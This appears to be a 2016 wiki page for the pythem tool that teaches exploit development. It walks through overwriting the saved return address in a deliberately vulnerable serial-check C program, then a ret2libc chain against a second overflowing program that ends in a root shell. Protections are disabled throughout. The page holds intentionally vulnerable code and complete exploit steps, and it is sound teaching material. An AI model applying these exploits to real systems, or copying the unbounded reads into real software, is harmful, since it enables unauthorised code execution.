
Exploit development

m4n3dw0lf edited this page Aug 16, 2016 · 16 revisions

# Exploit Development

## Exploit Development 1: Overwriting the Instruction Pointer

  • Vulnerable Serial-Key C program.
//Code from "Shellcoder's Handbook: Discovering and Exploiting Security Holes"
//Disable canaries and compile: gcc serial.c -fno-stack-protector -o serial
//  (on toolchains that default to PIE add -no-pie; the fixed 0x4006xx/0x4007xx addresses in the transcript only exist in a non-PIE binary)
//Disable ASLR (as root, system-wide, not persistent across reboots): echo 0 > /proc/sys/kernel/randomize_va_space

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Decide whether psz is an acceptable serial.
 *
 * Rules (all from the code below): length >= 10; every byte within
 * '0'..'z' (ASCII 48..122, a range that also admits punctuation such as
 * ':' '@' '[' '_' lying between the digit and letter runs); and the sum
 * of the byte values congruent to 83 modulo 853.
 *
 * Returns 1 for a valid serial, 0 otherwise.
 *
 * The scheme is deliberately weak (a single modular sum, so many strings
 * pass); it is only here to give the overflow in validate_serial()
 * something to bypass. Note this function's own frame is not what gets
 * smashed - the overflow happens in the caller.
 */
int valid_serial(char *psz){
	size_t len = strlen(psz);
	unsigned total = 0;
	size_t i;
	if (len < 10)
		return 0;
	for(i = 0; i < len ; i++){
		/* Bytes >= 0x80 are rejected on either char signedness: they
		 * compare below '0' when char is signed and above 'z' when
		 * it is unsigned. */
		if ((psz[i] < '0') || (psz[i] > 'z' ))
			return 0;

		total += psz[i];	/* accepted bytes are 48..122, so always non-negative */
	}
	if (total % 853 == 83)
		return 1;
	return 0;
}

/*
 * Read one whitespace-delimited token from stdin into a 24-byte stack
 * buffer and return valid_serial()'s verdict (1 valid, 0 invalid).
 *
 * THE BUG (intentional, this is the teaching target): "%s" carries no
 * field width, so fscanf writes as many non-whitespace bytes as arrive.
 * Everything past 24 bytes runs over the rest of this frame and then the
 * saved return address. The fuzz run below finds the saved RIP 40 bytes
 * into the input on x86-64; padding and the saved RBP presumably account
 * for the remaining 16 bytes - confirm with a debugger on your own build.
 * -fno-stack-protector means no canary sits between buffer and RIP.
 *
 * Because "%s" stops at whitespace, the payload must contain no
 * 0x09-0x0d or 0x20 bytes; the address 0x400723 used below has none.
 * The fix would be a bounded read ("%23s", or fgets plus a length check).
 */
int validate_serial(){
	char serial[24];
	fscanf(stdin, "%s", serial);	/* unbounded write into serial[24] */
	if (valid_serial(serial))
		return 1;
	else
		return 0;
}

/*
 * Success path: print the "valid" banner and terminate the process with
 * status 0. Never returns to its caller.
 *
 * Nothing here verifies how control arrived, which is why it is the
 * natural target for the overwritten return address in section 1. Its
 * address (0x400723 in the transcript) is specific to the author's
 * non-PIE build; re-read it from `disas main` after rebuilding.
 */
int do_valid_stuff(){
	printf("The serial number is valid!\n");
	// do serial-restricted, valid stuff here.
	exit(0);
}

/*
 * Failure path: emit the rejection message on stdout and terminate the
 * process with status 1. Never returns to its caller.
 */
int do_invalid_stuff(){
	fputs("Invalid serial number!\nExiting\n", stdout);
	exit(1);
}

/*
 * Entry point: read a serial from stdin and dispatch to the matching
 * handler. Both handlers call exit(), so the trailing return is only
 * reached if one of them ever returned (neither does). argc/argv are
 * unused.
 */
int main(int argc, char *argv[] ){
	(void)argc;
	(void)argv;
	int accepted = validate_serial();
	if (!accepted) {
		do_invalid_stuff();
	} else {
		do_valid_stuff();
	}
	return 0;
}
  • commands:
 pythem> echo 0 > /proc/sys/kernel/randomize_va_space

 pythem> gcc serial.c -fno-stack-protector -o serial
 
 pythem> ./serial
 123456
 Invalid serial number!
 Exiting

 pythem> set file ./serial

 pythem> xploit stdin

 xploit> disas main
 Dump of assembler code for function main:
              ...
 callq  0x400723 <do_valid_stuff>     (The function that should be reachable only with a valid serial; its address is the return-address target used below.)
              ...

 xploit> fuzz
              ...
 [*] Sending buffer with lenght: 39
 [*] Child program exited with code 1

 [*] Hit enter to continue.

 [*] Sending buffer with lenght: 40

 [*] Sending buffer with lenght: 41

 [*] Child program crashed with SIGSEGV code: -11
 ^C
 
 xploit> set arch x64
 
 xploit> set offset
 [+] Enter the offset (number of 'A's): 40
 xploit> set addr1
 [+] First address to overwrite: 0x400723
 
 xploit> xploit
 [+] Writing payload into buffer.txt

 [*] Sending buffer with lenght: 58

 The serial number is valid!

 Exiting 

## Exploit Development 2: Ret2libc

  • C program with a stack buffer overflow (used here for a ret2libc chain).
// Disable canaries and compile: gcc -fno-stack-protector vuln.c -o vuln
//   (on toolchains that default to PIE add -no-pie; the 0x400613 gadget address in the transcript only exists in a non-PIE binary)
// Disable ASLR (as root, system-wide, not persistent across reboots): echo 0 > /proc/sys/kernel/randomize_va_space
//   - required here because the libc addresses for "/bin/sh" and system() are taken at fixed locations

#include <stdio.h>
#include <unistd.h>

/*
 * Read up to 200 bytes from stdin into a 40-byte stack buffer, echo the
 * result, and return 0.
 *
 * THE BUG (intentional, this is the teaching target): read(0, buf, 200)
 * may write 160 bytes past the end of buf, over r, any padding, the
 * saved RBP and the saved return address. The fuzz run below places the
 * return address 56 bytes into the input (40 for buf, the rest presumably
 * r/padding and the 8-byte saved RBP - confirm on your own build). Unlike
 * the fscanf("%s") case, raw read() imposes no restriction on payload
 * bytes. The fix would be read(0, buf, sizeof buf - 1) plus NUL-termination.
 *
 * Secondary defect: read() does not NUL-terminate, and r is not checked
 * for -1, so the "%s" below prints whatever lies before the first zero
 * byte - which may be less or more than the input (the transcript echoes
 * only a prefix of the 98-byte payload).
 */
int vuln() {
    char buf[40];
    int r;
    r = read(0, buf, 200);  /* 200 > sizeof buf: stack smash */
    printf("\nRead %d bytes. buf is %s\n", r, buf);  /* buf may be unterminated */
    return 0;
}


/*
 * Entry point: print a banner and call the vulnerable function.
 * The banner has no trailing newline, so with buffered stdout it may
 * only become visible when vuln() later prints its "\n".
 *
 * NOTE(review): the transcript below shows "Try to bash" whereas this
 * listing prints "Try to sh" - presumably captured from a different
 * build of the same program.
 */
int main(int argc, char *argv[]) {
    printf("Try to sh");
    vuln();
    return 0;
}
  • commands:
 pythem> echo 0 > /proc/sys/kernel/randomize_va_space

 pythem> gcc vuln.c -fno-stack-protector -o vuln  
 
 pythem> set file ./vuln

 pythem> xploit stdin

 xploit> set arch x64

 xploit> fuzz
               ...
 [*] Sending buffer with lenght: 48
               ...
 [*] Child program exited with code: 0
 
 [*] Hit enter to continue.

 [*] Sending buffer with lenght: 49
               ...
 [*] Child program crashed with SIGSEGV code: -11

               ...

 [+] Sending buffer with lenght: 55
               ...
 [+] Instruction Pointer may be near: 55

 [*] Child program crashed with code: -7
                ...
 [*] Sending buffer with lenght: 58
                ...
 [*] Child program crashed with SIGSEGV code: -11
 ^C

The saved return address starts somewhere between 55 and 58 bytes into the input; 56 is used below, being the only 8-byte-aligned value in that range on x86-64. The chain written after the padding is: the address of a `pop rdi; ret` gadget in the binary, the address of the "/bin/sh" string in libc (popped into RDI, the first argument register), then the address of `system`. The libc addresses only hold with ASLR disabled and the exact libc build in use here; re-read them on your own system. The shell is root only because the program itself is run as root (note the `#` prompt).

  xploit> set offset 56

  xploit> search instructions
  [+] Find: % rdi
                ...
  [INFO] File: ./vuln
  0x0000000000400613: pop rdi; ret;

  xploit> set addr1
  [+] First address to overwrite: 0x0000000000400613

  xploit> find "/bin/sh"
                 ...
  Found 1 results, display max 1 items:
  libc : 0x7ffff7b9c598 --> 0x68732f6e69622f ('/bin/sh')

  xploit> set addr2
  [+] Second address to overwrite: 0x7ffff7b9c598

  xploit> p system
                  ...
  $1 = {<text variable, no debug info>} 0x7ffff7a76710 <__libc_system>

  xploit> set shellcode
  [+] Enter the shellcode: 0x7ffff7a76710

  xploit> xploit

  [+] Writing payload into buffer.txt

  [*] Sending buffer with lenght: 98
                   ...
  [!] If it does not work automatically, run on terminal: (cat buffer.txt ; cat) | ./vuln

  xploit> exit
  
  pythem> exit 

  # (cat buffer.txt; cat) | ./vuln
  Try to bash
  Read 98 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb
  id
  uid=0(root) gid=0(root) groups=0(root)
  whoami
  root